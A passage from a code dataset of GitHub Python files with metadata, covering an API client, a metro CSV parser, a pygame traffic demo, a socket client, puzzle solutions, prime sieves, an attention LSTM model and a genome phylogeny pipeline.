tenant_id=self.tenant_id,\n producer_id=producer_id)\n return remote_url\n\n def create_producer(self, name=None, pattern=None,\n durable=None, encrypted=None):\n \"\"\"\n POST /{api_version}/{tenant_id}/producers\n @summary: Creates a new producer on a tenant\n \"\"\"\n\n request_producer = CreateProducer(\n producer_name=name,\n producer_pattern=pattern,\n producer_durable=durable,\n producer_encrypted=encrypted)\n\n url = '{base}/{tenant_id}/producers'.format(\n base=self._get_base_url(),\n version=self.api_version,\n tenant_id=self.tenant_id)\n\n producer_request = self.request('POST', url,\n request_entity=request_producer)\n\n return producer_request\n\n def delete_producer(self, producer_id):\n \"\"\"\n DELETE /{app_version}/{tenant_id}/producers/{producer_id}\n @summary: Removes a producer from a tenant\n \"\"\"\n remote_url = self._generate_producer_url(producer_id)\n response = self.request('DELETE', remote_url)\n\n return response\n\n def update_producer(self, producer_id, name=None, pattern=None,\n durable=None, encrypted=None):\n \"\"\"\n PUT /{app_version}/{tenant_id}/producers/{producer_id}\n @summary: Updates a producer\n \"\"\"\n producer_obj = UpdateProducer(producer_name=name,\n producer_pattern=pattern,\n producer_durable=durable,\n producer_encrypted=encrypted)\n remote_url = self._generate_producer_url(producer_id)\n response = self.request('PUT', remote_url, request_entity=producer_obj)\n return response\n\n def get_producer(self, producer_id):\n \"\"\"\n GET /{app_version}/{tenant_id}/producers/{producer_id}\n @summary: Retrieves a Producer on a tenant\n \"\"\"\n remote_url = self._generate_producer_url(producer_id)\n response = self.request('GET', remote_url,\n response_entity_type=Producer)\n return response\n\n def get_all_producers(self):\n \"\"\"\n GET /{app_version}/{tenant_id}/producers\n @summary: Retrieves all producers on a given tenants\n \"\"\"\n remote_url = '{base}/{tenant_id}/producers'.format(\n base=self._get_base_url(),\n tenant_id=self.tenant_id)\n\n response = self.request('GET', remote_url,\n response_entity_type=AllProducers)\n return response\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/meniscus/tenant_api/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71639186026","text":"# -*- coding: utf-8 -*-\r\n\r\n############ Imports ############\r\n\r\nfrom collections import OrderedDict\r\n\r\n############ Fonctions fichiers ############\r\n\r\ndef listeMetroCsv(Fname):\r\n \"\"\"\r\n Fonction qui lit un fichier .csv et qui en extrait le nom de la station,\r\n sa ligne et sa place sur cette dernière.\r\n \"\"\"\r\n F = open(Fname)\r\n L1, L2, L3 = [], [], []\r\n for l in F.readlines()[1:]: # on exclue la première ligne\r\n ptdata = l.split(sep=';')\r\n i=0\r\n for ptd in ptdata :\r\n ptdata[i] = str(ptd)\r\n i+=1\r\n L1.append(ptdata)\r\n \r\n for var in L1:\r\n for i in range (0,3):\r\n L2.append(var[i])\r\n L3.append(L2)\r\n L2=[]\r\n \r\n F.close()\r\n return L3\r\n \r\ndef listeMetroCsvStation(Fname):\r\n \"\"\"\r\n Fonction qui lit un fichier .csv et qui en extrait le nom des stations.\r\n \"\"\"\r\n F = open(Fname)\r\n L1, L2, L3 = [], [], []\r\n for l in F.readlines()[1:]: # on exclue la première ligne\r\n ptdata = l.split(sep=';')\r\n i=0\r\n for ptd in ptdata :\r\n ptdata[i] = str(ptd)\r\n i+=1\r\n L1.append(ptdata)\r\n \r\n for var in L1:\r\n L2.append(var[1])\r\n \r\n F.close()\r\n return L2\r\n\r\ndef listeMetroCsvInfos(Fname):\r\n \"\"\"\r\n Fonction qui lit un fichier .csv et qui en extrait les données choisies préalablement.\r\n \"\"\"\r\n F = open(Fname)\r\n L1, L2, L3 = [], [], []\r\n for l in F.readlines()[1:]: # on exclue la première ligne\r\n ptdata = l.split(sep=';')\r\n i=0\r\n for ptd in ptdata :\r\n ptdata[i] = str(ptd)\r\n i+=1\r\n L1.append(ptdata)\r\n \r\n for var in L1:\r\n for i in [0,-3,-2]:\r\n if i==-3:\r\n L2.append(((int(var[i].split(sep='-')[0])+int(var[i].split(sep='-')[1]))/2)*60)\r\n else:\r\n L2.append(var[i])\r\n L3.append(L2)\r\n L2=[]\r\n\r\n F.close()\r\n return L3\r\n\r\n\r\ndef dictMetroCsv(l):\r\n \"\"\"\r\n Fonction qui retourne un dictionnaire des stations triées par ligne.\r\n \"\"\"\r\n registre=dict()\r\n temp=dict()\r\n l1,l2,l3,l3b,l4,l5,l6,l7,l7b,l8,l9,l10,l11,l12,l13,l14=[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]\r\n \r\n for var in l:\r\n if var[0]==\"M1\":\r\n l1.append(var[1])\r\n if var[0]==\"M2\":\r\n l2.append(var[1])\r\n if var[0]==\"M3\":\r\n l3.append(var[1])\r\n if var[0]==\"M3b\":\r\n l3b.append(var[1])\r\n if var[0]==\"M4\":\r\n l4.append(var[1])\r\n if var[0]==\"M5\":\r\n l5.append(var[1])\r\n if var[0]==\"M6\":\r\n l6.append(var[1])\r\n if var[0]==\"M7\":\r\n l7.append(var[1])\r\n if var[0]==\"M7b\":\r\n l7b.append(var[1])\r\n if var[0]==\"M8\":\r\n l8.append(var[1])\r\n if var[0]==\"M9\":\r\n l9.append(var[1])\r\n if var[0]==\"M10\":\r\n l10.append(var[1])\r\n if var[0]==\"M11\":\r\n l11.append(var[1])\r\n if var[0]==\"M12\":\r\n l12.append(var[1])\r\n if var[0]==\"M13\":\r\n l13.append(var[1])\r\n if var[0]==\"M14\":\r\n l14.append(var[1])\r\n temp[\"M1\"]=l1\r\n temp[\"M2\"]=l2\r\n temp[\"M3\"]=l3\r\n temp[\"M3b\"]=l3b\r\n temp[\"M4\"]=l4\r\n temp[\"M5\"]=l5\r\n temp[\"M6\"]=l6\r\n temp[\"M7\"]=l7\r\n temp[\"M7b\"]=l7b\r\n temp[\"M8\"]=l8\r\n temp[\"M9\"]=l9\r\n temp[\"M10\"]=l10\r\n temp[\"M11\"]=l11\r\n temp[\"M12\"]=l12\r\n temp[\"M13\"]=l13\r\n temp[\"M14\"]=l14\r\n \r\n registre = OrderedDict(sorted(temp.items(), key=lambda t: t[0]))\r\n\r\n return registre\r\n","repo_name":"are00dynamic-2018/RATP_Project","sub_path":"src/LibMetroCsv_NB.py","file_name":"LibMetroCsv_NB.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"8290180073","text":"n1 = int(input(\"Digite o primeiro número: \"))\nn2 = int(input(\"Digite o segundo número: \"))\na = n1 + n2\ns = n1 - n2\nm = n1 * n2\nd = n1 / n2\np = n1 ** n2\ndi = n1 // n2\nrd = n1 % n2\nprint(\" Os resultados são: \\n adição {}, \\n subtracão {}, multiplicação {}, divisão {:.3f} \".format(a, s, m, d), end=\" >>> \")\nprint(\"Os resultados restantes são: potenciação {}, divisão inteira {} e resto da divisão {} \".format(p, di, rd))\n\n\n\n\n\n\n","repo_name":"Lucas-Urbano/Python_Start","sub_path":"aula07a.py","file_name":"aula07a.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73777756908","text":"import pygame\r\nimport random\r\nfrom random import randint\r\n\r\nprint()\r\nprint()\r\nprint()\r\nprint(\"Together we'll build a busy city full of traffic today!\")\r\nscreenx = int(input(\"Choose the horizontal resolution of the game: \"))\r\nscreeny = int(input(\"Choose the vertical resolution of the game: \"))\r\npygame.init() # Prepare pygame\r\nclock = pygame.time.Clock() # To set game speed\r\nscreen = pygame.display.set_mode((screenx, screeny))\r\ncarwidth = int(input(\"Choose how large you want your car to be (square side): \"))\r\n\r\ncar = pygame.image.load('car_sprites.png')\r\ncar = pygame.transform.scale(car, (8 * carwidth, carwidth))\r\n\r\ntypecarfw = [0, carwidth*2, carwidth*4, carwidth*6] #backwards\r\ntypecarbw = [carwidth, carwidth*3, carwidth*5, carwidth*7] #forwards\r\nstreets = int(input(\"How many streets do you want? \"))\r\nrows = streets * 2\r\n\r\nprint(\"I'll do the hard work of selecting how large are the rivers between the streets!\")\r\nclock.tick(1)\r\nok = input(\"Is that ok for you? Y/N: \")\r\nif ok == 'y' or ok == 'Y' :\r\n \r\n rivers = []\r\n for street in range(streets):\r\n rivers.append(random.randint(0, 9))\r\n\r\nelse:\r\n rivers = []\r\n print(\"This is your list of how large you want the rivers to be, yet..\", rivers)\r\n clock.tick(1)\r\n print(\"This is your mission: insert how large you want every river to be\")\r\n print(\"0 means no river; 1 means that the river is large as the cars; 2 means the river is twice the cars\")\r\n print(\"And so on...\")\r\n for street in range(streets):\r\n rivers.append(int(input(\"Choose how large do you want the river \" + str(street + 1) + \" to be: \")))\r\n print(\"Well done!\")\r\n \r\nprint(\"Now see it in action!\")\r\n\r\ncarrow = []\r\n\r\n\r\nfor row in range(rows):\r\n \r\n if row == 0:\r\n carrow.append(carwidth)\r\n else:\r\n if row%2 ==1:\r\n carrow.append(carrow[row-1] + carwidth + carwidth // 8)\r\n if row%2 == 0:\r\n if rivers[row//2] == 0:\r\n carrow.append(carrow[row-1] + carwidth * (rivers[row//2] + 1) + carwidth // 8)\r\n else:\r\n carrow.append(carrow[row-1] + carwidth * (rivers[row//2] + 1))\r\n\r\n\r\n\r\n\r\n#cars = [7, 5, 2, 3] numero di macchine per corsia, la lunghezza della lista corrisponde al numero di corsie\r\ncars = []\r\nfor k in range(rows):\r\n cars.append(randint(1, 9))\r\ndistance = []\r\nfor r in range(rows):\r\n distance.append((screenx + carwidth) // cars [r])\r\ncarinrowbw=[]\r\ncarinrowfw=[]\r\n\r\n\r\nfor k in range(9):\r\n carinrowbw.append(random.choice(typecarbw))\r\nfor k in range(9):\r\n carinrowfw.append(random.choice(typecarfw))\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\nplaying = True\r\nwhile playing:\r\n for e in pygame.event.get(): # Handle events: mouse, keyb etc.\r\n if e.type == pygame.QUIT: playing = False\r\n \r\n for mov in range(screenx + carwidth):\r\n \r\n screen.fill((255, 255, 255))\r\n for r in range(rows):\r\n pygame.draw.rect(screen, (40,43,42), (0, carrow[r], screenx, carwidth))\r\n \r\n x = 0\r\n for a in range(screenx + carwidth // carwidth):\r\n for r in range(0, rows, 2):\r\n \r\n pygame.draw.rect(screen, (40, 43, 42), (x, carrow[r] + carwidth, carwidth, carwidth // 8))\r\n \r\n x += carwidth*2\r\n for row in range(rows):\r\n if row%2 == 0:\r\n x = -mov\r\n for i in range(cars[row]):\r\n if -carwidth <= x < 0:\r\n screen.blit(car, (x, carrow[row]), area=(carinrowbw[i], 0, carwidth, carwidth))\r\n x += distance[row]\r\n else:\r\n screen.blit(car, (x % (screenx + carwidth), carrow[row]), area=(carinrowbw[i], 0, carwidth, carwidth))\r\n x += distance[row]\r\n elif row%2 == 1:\r\n x = mov\r\n for i in range(cars[row]):\r\n if screenx <= x < (screenx + carwidth):\r\n screen.blit(car, (x - (screenx + carwidth), carrow[row]), area=(carinrowfw[i], 0, carwidth, carwidth))\r\n x += distance[row]\r\n else:\r\n \r\n screen.blit(car, (x % (screenx + carwidth), carrow[row]), area=(carinrowfw[i], 0, carwidth, carwidth))\r\n x += distance[row]\r\n \r\n \r\n \r\n \r\n pygame.display.flip()\r\n\r\n \r\npygame.quit() \r\nquit()\r\n","repo_name":"cad0p/froggah","sub_path":"froggah.py","file_name":"froggah.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1627012417","text":"#!/usr/bin/env python3\nimport json\nimport re\nimport socket\nimport sys\nfrom threading import Thread\n\nimport drawing\n\n\ndef my_parse_url(url):\n if (url[:12] != 'pictochat://'):\n return (None, None)\n url = url[12:]\n if (not re.search(r'^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}(\\:[0-9]{1,4})?\\/?$', url)):\n return (None, None)\n foo = url.split(':')\n if (foo[1][-1] == '/'):\n foo[1] = foo[1][:-1]\n return (foo[0], int(foo[1]))\n\n\ndef main(argv):\n if (len(argv) > 2):\n sys.stderr.write('usage: %s [url]' % argv[0])\n sys.exit(1)\n if (len(argv) == 2):\n host, port = my_parse_url(argv[1])\n else:\n host = None\n port = None\n try:\n f = open('config.json', 'r')\n d = json.loads(f.read())\n except FileNotFoundError:\n d = None\n if (host is None or port is None):\n try:\n host = d['host']\n except (TypeError, KeyError):\n host = input('host: ')\n try:\n port = int(d['port'])\n except (TypeError, KeyError, ValueError):\n port = int(input('port: '))\n if (d is None):\n d = {\n 'host': host,\n 'port': port,\n }\n f = open('config.json', 'w')\n f.write(json.dumps(d))\n f.close()\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.connect((host, port))\n except ConnectionRefusedError:\n print('failed to connect to server')\n sys.exit(1)\n print('connected')\n drawing.main(s)\n\n\nif (__name__ == '__main__'):\n main(sys.argv)\n","repo_name":"byron123t/PictoRoom","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"39565405899","text":"from PIL import Image\nfrom pytesseract import *\nimport Ecuacion\n\nclass ImagenAEcuacion:\n def __init__(self,direccionImagen): \n pytesseract.tesseract_cmd=r'C:\\Users\\User\\AppData\\Local\\Programs\\Tesseract-OCR\\tesseract.exe'\n\n img=Image.open(direccionImagen)\n resultado=pytesseract.image_to_string(img,lang='eng+equ+osd')\n print(\"IA: \"+resultado)\n resultado=resultado.replace('%','^')\n resultado=resultado.replace('*','^',1)\n resultado=resultado.replace('\f','')\n print(\"Casteo: \"+resultado)\n iniciador=Ecuacion.ResolverEcuacion(resultado)\n self.ecuacion=iniciador.ecuacion\n self.resultado=iniciador.resultado","repo_name":"AlexanderNT24/SolucionCuadraticaPython","sub_path":"IAImagenes.py","file_name":"IAImagenes.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2978220931","text":"import sys; sys.dont_write_bytecode = True; from utils import *\n\ndef do_case(inp: str, sample=False):\n # READ THE PROBLEM FROM TOP TO BOTTOM OK\n def sprint(*a, **k): sample and print(*a, **k)\n lines = inp.splitlines()\n paras = inp.split(\"\\n\\n\")\n out = 0\n\n one, two = paras\n one = ints(one)[1:]\n two = ints(two)[1:]\n\n def score(winner):\n out = 0\n for i, x in enumerate(list(winner)[::-1]):\n out += (i+1) * x\n return out\n \n # @functools.lru_cache(maxsize=None)\n def one_won_and_winner(one, one_card, two, two_card):\n # print(one, one_card, two, two_card)\n if len(one) >= one_card and len(two) >= two_card:\n pass\n else:\n if one_card > two_card:\n return True, score(one)\n else:\n return False, score(two)\n one = one[:one_card]\n two = two[:two_card]\n one = deque(one)\n two = deque(two)\n seen = set() # (tuple(one), tuple(two))\n while one and two:\n hashed = (tuple(one), tuple(two))\n if hashed in seen:\n return True, score(one)\n seen.add(hashed)\n one_card = one.popleft()\n two_card = two.popleft()\n\n if one_won_and_winner(tuple(one), one_card, tuple(two), two_card)[0]:\n one.append(one_card)\n one.append(two_card)\n else:\n two.append(two_card)\n two.append(one_card)\n if one:\n return True, score(one)\n else:\n return False, score(two)\n \n\n\n print(one_won_and_winner(one, len(one), two, len(two)))\n\n\n\n if out:\n print(\"out: \", out)\n return # RETURNED VALUE DOESN'T DO ANYTHING, PRINT THINGS INSTEAD\n\n\n\nrun_samples_and_actual([\nr\"\"\"\nPlayer 1:\n9\n2\n6\n3\n1\n\nPlayer 2:\n5\n8\n4\n7\n10\n\n\"\"\",r\"\"\"\nPlayer 1:\n43\n19\n\nPlayer 2:\n2\n29\n14\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\",r\"\"\"\n\n\"\"\"], do_case)\n","repo_name":"mcpower/adventofcode","sub_path":"2020/22/a-p2.py","file_name":"a-p2.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"37"}
+{"seq_id":"23033550903","text":"import math\n\n# Sieve of Eratosthenes Python Code\ndef prime_eratosthenes(n):\n dump_list = []\n prime_list = []\n for i in range(2, n + 1):\n if i not in dump_list:\n prime_list.append(i)\n for j in range(i * i, n + 1, i):\n dump_list.append(j)\n return prime_list\n\n\n# Naive Approach Python Code\ndef prime_Naive(n):\n if n <= 1:\n return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True\n\n\ndef printPrime(n):\n prime_list = []\n for i in range(2, n + 1):\n if prime_Naive(i):\n prime_list.append(i)\n return prime_list\n\n\n# Sieve of Atkins Python Code\ndef prime_Atkins(n):\n prime_list = [2, 3]\n sieve = [False] * (n + 1)\n for x in range(1, int(math.sqrt(n)) + 1):\n for y in range(1, int(math.sqrt(n)) + 1):\n q = 4 * x ** 2 + y ** 2\n if q <= n and (q % 12 == 1 or q % 12 == 5):\n sieve[q] = not sieve[q]\n q = 3 * x ** 2 + y ** 2\n if q <= n and q % 12 == 7:\n sieve[q] = not sieve[q]\n q = 3 * x ** 2 - y ** 2\n if x > y and q <= n and q % 12 == 11:\n sieve[q] = not sieve[q]\n for x in range(5, int(math.sqrt(n))):\n if sieve[x]:\n for y in range(x ** 2, n + 1, x ** 2):\n sieve[y] = False\n\n for a in range(5, n):\n if sieve[a]:\n prime_list.append(a)\n return prime_list\n","repo_name":"Saro259/prime_number_generator","sub_path":"myproject/primeapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74182104746","text":"class Solution(object):\n def maxCoins(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums = [1] + [num for num in nums if num > 0] + [1]\n n = len(nums)\n # n = 3\n dp = [[0] * n for _ in xrange(n)]\n\n for k in xrange(2,n):\n for left in xrange(0,n-k):\n right = left + k\n # print('-'*10)\n # print(\"left is {0}, right is {1}\".format(left, right))\n for i in xrange(left+1,right):\n dp[left][right] = max(dp[left][right], nums[left]*nums[i]*nums[right] + dp[left][i] + dp[i][right])\n # print(\"nums[left]*nums[i]*nums[right] is {0}, dp[left][i] is {1}, dp[i][right] is {2}\".format(nums[left]*nums[i]*nums[right], dp[left][i], dp[i][right]))\n # print(\"left is {0}, right is {1}, dp is {2}\".format(left, right, dp[left][right]))\n # print(\"result is left is {0}, right is {1}, result is {2}\".format(left, right, dp[left][right]))\n\n return dp[0][n-1]\n\n\nprint(Solution().maxCoins([3, 1, 5, 8]))","repo_name":"yuzixun/algorithm_exercise","sub_path":"main/20170503-312.py","file_name":"20170503-312.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32353983887","text":"import os\nfrom setuptools import setup, find_packages\n\n__doc__ = \"\"\"A python library for communicating with LimitlessLED/Milight/Easybulb compatible wifi bridges.\"\"\"\n\nsetup(\n name=\"mookfist-lled-controller\",\n description=__doc__,\n version=\"0.1.5\",\n author=\"mookfist\",\n author_email=\"mookfist@gmail.com\",\n url=\"https://github.com/mookfist/mookfist-lled-controller\",\n scripts=['lled.py'],\n packages=find_packages(),\n install_requires=[\n 'docopt',\n 'colorama',\n 'sphinx_rtd_theme',\n 'six'\n ],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3'\n ],\n keywords=['milight','limitlessled']\n)\n","repo_name":"mookfist/mookfist-lled-controller","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"23360009300","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\n\r\nclass AttentionRecurrentModel(nn.Module):\r\n def __init__(self, input_size, n_classes, hidden_dim, attn_dim=60, num_layers=1, bidirection=True, flag_cuda=False):\r\n '''\r\n Create a LSTM classifier initialize their weights.\r\n Take the weighted average of all hidden units for generating classes\r\n Arguments:\r\n input_size (tuple): A tuple of ints with (num of indices, time steps, feature_dimension) => (N, T, D)\r\n hidden_dim (int): Number of hidden activations to use\r\n n_classes (int): Number of classes to score\r\n attn_dim (int): Number of hidden nodes in attention layers\r\n num_layers (int): Number of LSTM layers\r\n bidirection(bool): Bidirection LSTM or not, for attention model the default value is True\r\n flag_cuda(bool): Whether cuda support is enabled or not\r\n '''\r\n super(AttentionRecurrentModel, self).__init__()\r\n self.input_size = input_size\r\n self.n_classes = n_classes\r\n self.hidden_dim = hidden_dim\r\n self.attn_dim = attn_dim\r\n self.num_layers = num_layers\r\n self.bidirection = bidirection\r\n if self.bidirection is True:\r\n self.num_direction = 2\r\n else:\r\n self.num_direction = 1\r\n # set batch_first to make input and output in tensor of (N,T,D) but not h0, c0\r\n self.lstm_layer = nn.LSTM(input_size=input_size[-1], hidden_size=hidden_dim, num_layers=self.num_layers, batch_first=True, bidirectional=self.bidirection)\r\n self.dropout_layer = nn.Dropout(p=0.2)\r\n self.fc_layer = nn.Linear(hidden_dim*self.num_direction , n_classes)\r\n self.attn = nn.Linear(self.hidden_dim*self.num_direction, 1, bias=False)\r\n self.flag_cuda = flag_cuda\r\n\r\n\r\n def init_hidden(self, batch_size):\r\n '''\r\n Init states\r\n :param batch_size (int)\r\n :return: initial hidden and cell states, both are tensors in (num_layers * num_directions, batch, hidden_size)\r\n '''\r\n h0, c0 = (Variable(torch.zeros(self.num_layers*self.num_direction, batch_size, self.hidden_dim)), Variable(torch.zeros(self.num_layers*self.num_direction, batch_size, self.hidden_dim)))\r\n if self.flag_cuda:\r\n h0, c0 = h0.cuda(), c0.cuda()\r\n return h0, c0\r\n\r\n def forward(self, x, lengths):\r\n batch_size = len(x)\r\n h, c = self.init_hidden(batch_size)\r\n sequence = nn.utils.rnn.pack_padded_sequence(x.float(), lengths, batch_first=True)\r\n hx_seq, (hn, cn) = self.lstm_layer(sequence, (h, c)) #hx_seq ( N, T, D)\r\n output, length_list = nn.utils.rnn.pad_packed_sequence(hx_seq, batch_first=True)\r\n (N, T, D) = output.size()\r\n step_vector = self.attn(output.contiguous().view(-1, self.hidden_dim*self.num_direction)) # out_dim (N*T, 1)\r\n attn_weights = F.softmax(F.tanh(step_vector.view(-1, T))) # out_dim (N, T)\r\n\r\n # create mask based on valid lengths\r\n mask = torch.ones(attn_weights.size())\r\n for i, l in enumerate(length_list):\r\n if l < T:\r\n mask[i, l:] = 0\r\n\r\n # apply mask and re-normalize attention weights\r\n mask = Variable(mask)\r\n if self.flag_cuda:\r\n mask = mask.cuda()\r\n masked = attn_weights*mask\r\n _sums = masked.sum(-1).unsqueeze(1).expand_as(attn_weights)\r\n attentions = masked.div(_sums)\r\n\r\n # Size of attn_weights/attentions should be (N, T, 1)\r\n temp_attn =attentions.view(-1, T, 1).repeat(1,1,self.hidden_dim*self.num_direction) # out_dim (N,T,1)=> (N,T,H)\r\n # Calculating weighted sum of hidden states\r\n attn_applied = torch.mul(temp_attn, output) # out_dim (N,T,H)\r\n weighted = torch.sum(attn_applied, dim=1)\r\n score = self.fc_layer(self.dropout_layer(torch.squeeze(weighted, dim=1)))\r\n return score\r\n","repo_name":"Saqibm128/sepsisProject","sub_path":"learning/deepLearn/model/attention_rnn_pad.py","file_name":"attention_rnn_pad.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"15920604580","text":"from enum import Enum\n\nclass Motion(Enum):\n R = [0, 1]\n L = [0, -1]\n U = [1, 0]\n D = [-1, 0]\n\ndef moveRight(knot):\n knot[1] += 1\n return knot\n\ndef moveLeft(knot):\n knot[1] += -1\n return knot\n\ndef moveUp(knot):\n knot[0] += 1\n return knot\n\ndef moveDown(knot):\n knot[0] += -1\n return knot\n\ndef isTouching(head, tail):\n if abs(head[0] - tail[0]) == 1 and abs(head[1] - tail[1]) == 1:\n return True\n\ndef moveTail(head, tail):\n if head[0] == tail[0] and head[1] == tail[1]:\n return tail\n if head[0] == tail[0] and head[1] - tail[1] > 1:\n tail = moveRight(tail)\n return tail\n if head[0] == tail[0] and head[1] - tail[1] < -1:\n tail = moveLeft(tail)\n return tail\n if head[1] == tail[1] and head[0] - tail[0] > 1:\n tail = moveUp(tail)\n return tail\n if head[1] == tail[1] and head[0] - tail[0] < -1:\n tail = moveDown(tail)\n return tail\n if (head[0] - tail[0] > 0 and head[1] - tail[1] > 0) and not isTouching(head, tail):\n tail = moveUp(tail)\n tail = moveRight(tail)\n return tail\n if (head[0] - tail[0] > 0 and head[1] - tail[1] < 0) and not isTouching(head, tail):\n tail = moveUp(tail)\n tail = moveLeft(tail)\n return tail\n if (head[0] - tail[0] < 0 and head[1] - tail[1] > 0) and not isTouching(head, tail):\n tail = moveDown(tail)\n tail = moveRight(tail)\n return tail\n if (head[0] - tail[0] < 0 and head[1] - tail[1] < 0) and not isTouching(head, tail):\n tail = moveDown(tail)\n tail = moveLeft(tail)\n return tail\n \n return tail\n\nwith open(\"Day 9/motions.txt\") as motions:\n headIndex = [0, 0]\n tailIndex = [0, 0]\n headIndexDict = {str(headIndex) : 1}\n tailIndexDict = {str(tailIndex) : 1}\n for line in motions:\n motion = line.split()\n for i in range(int(motion[1])):\n headIndex[0] += Motion[motion[0]].value[0]\n headIndex[1] += Motion[motion[0]].value[1]\n if str(headIndex) in headIndexDict:\n headIndexDict[str(headIndex)] += 1\n else:\n headIndexDict[str(headIndex)] = 1\n\n tailIndex = moveTail(headIndex, tailIndex)\n if str(tailIndex) in tailIndexDict:\n tailIndexDict[str(tailIndex)] += 1\n else:\n tailIndexDict[str(tailIndex)] = 1\n #print(tailIndex)\n\n print(len(tailIndexDict))","repo_name":"coltrane05/AdventOfCode2022","sub_path":"Day 9/Day9Solution1.py","file_name":"Day9Solution1.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24956903531","text":"import os\nimport sys\nimport datetime\nimport argparse\nimport time\n\ntoday = datetime.date.today().strftime('Results_%b%d')\n\n\ndef get_parameters():\n parse = argparse.ArgumentParser()\n parse.add_argument('-i', required=True, action='store', help='Input a directory contains genome files, and the genomes must end with (.fa, .fna., .fasta)')\n parse.add_argument('-a', required=True, action='store', help='Output directory contains proteins (.faa)')\n parse.add_argument('-t', required=True, action='store', help='Threads used for prokka,orthofinder')\n args = parse.parse_args()\n return args\n\n\n\ndef prokka_(genomes_dir, threads):\n endslist = ['fa', 'fna', 'fasta']\n to_dir = 'final_prokka'\n if not os.path.exists(to_dir):\n os.mkdir(to_dir)\n for i in os.listdir(genomes_dir):\n ends_ = i.split(\".\")[-1]\n if ends_ in endslist:\n genomes_path = os.path.join(genomes_dir, i)\n outdir = f'{to_dir}/{i.split(\".f\")[0]}'\n prefix = f'{i.split(\".f\")[0]}'\n cmd = f\"prokka --outdir {outdir} --prefix {prefix} --noanno --norrna --notrna --locustag '{prefix}|ORF' --cpus {threads} {genomes_path}\"\n print(cmd)\n os.system(cmd)\n\ndef orthofinder_(faa_dir, threads):\n if not os.path.exists(faa_dir):\n os.mkdir(faa_dir)\n try:\n cp_cmd = f'cp final_prokka/*/*faa {faa_dir}'\n os.system(cp_cmd)\n except Exception:\n pass\n if not os.path.exists(f'{faa_dir}/OrthoFinder'):\n cmd_ = f'orthofinder -og -f {faa_dir} -t {threads}'\n os.system(cmd_)\n\n\ndef clusto_(faa_dir):\n out_put = 'final_clustalo_fasta'\n if not os.path.exists(out_put):\n os.mkdir(out_put)\n #for i in os.listdir(\"faa_dir/OrthoFinder/\"):\n\t\n for i in os.listdir(\"faa_dir/OrthoFinder/\" + today + \"/Single_Copy_Orthologue_Sequences\"):\n name = i.split(\".f\")[0]\n to_name = f'{out_put}/{name}.fasta'\n cmd = f'clustalo -i {faa_dir}/OrthoFinder/{today}/Single_Copy_Orthologue_Sequences/{i} -o {to_name}'\n os.system(cmd)\n print(cmd)\n\ndef align_():\n cmd = 'python AlignConcat.py -i final_clustalo_fasta -o final.aln'\n os.system(cmd)\n\n\ndef gblock_():\n cmd = 'sh Gblocks.sh final.aln'\n os.system(cmd)\n\n\ndef iqtree_():\n cmd = 'iqtree -s final.aln-gb -m LG+F+R4 -bb 1000 -nt 45'\n os.system(cmd)\n\nif __name__ == '__main__':\n #python tree_build_orthofinder.py -i genomes -a faa_dir -t 60 \n\n arge = get_parameters()\n genomes_dir = arge.i\n faa_dir = arge.a\n threads = arge.t\n\n\n clusto_dir = 'final_clustalo_fasta'\n\n if not os.path.exists(faa_dir):\n prokka_(genomes_dir, threads)\n\n \n orthofinder_(faa_dir, threads)\n time.sleep(5)\n \n if not os.path.exists(clusto_dir):\n clusto_(faa_dir)\n if not os.path.exists('final.aln'):\n align_()\n\n #if not os.path.exists('final.aln-gb'):\n gblock_()\n\n iqtree_()\n\n\n\n\n\n\n","repo_name":"allen-zhan340/bacteria-phylogeny-procedure","sub_path":"tree_build_orthofinder.py","file_name":"tree_build_orthofinder.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
